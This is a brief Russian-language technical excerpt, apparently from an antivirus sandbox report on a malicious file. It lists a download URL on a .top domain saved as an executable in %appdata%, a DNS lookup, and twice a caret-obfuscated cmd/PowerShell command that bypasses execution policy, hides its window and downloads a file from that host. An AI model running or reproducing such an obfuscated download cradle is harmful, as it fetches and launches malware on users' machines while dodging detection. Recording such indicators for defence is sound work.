Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POW^e^rSHE^LL.E^xE ^-^EXEcU^TiONPOli^C^Y^ bY^pa^sS ^-NOPrOfil^e -WI^n^D^OWsTYl^e hI^ddeN ^(NE^w^-Ob^Ject^ sy^s^tE^M.nET.wEbc^li^e^Nt)^.doWN^l^oA^D^f^iLE^('http://sutrap...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "POW^e^rSHE^LL.E^xE ^-^EXEcU^TiONPOli^C^Y^ bY^pa^sS ^-NOPrOfil^e -WI^n^D^OWsTYl^e hI^ddeN ^(NE^w^-Ob^Ject^ sy^s^tE^M.nET.wEbc^li^e^Nt)^.doWN^l^oA^D^f^iLE^('http://sutrap...' (со скрытым окном)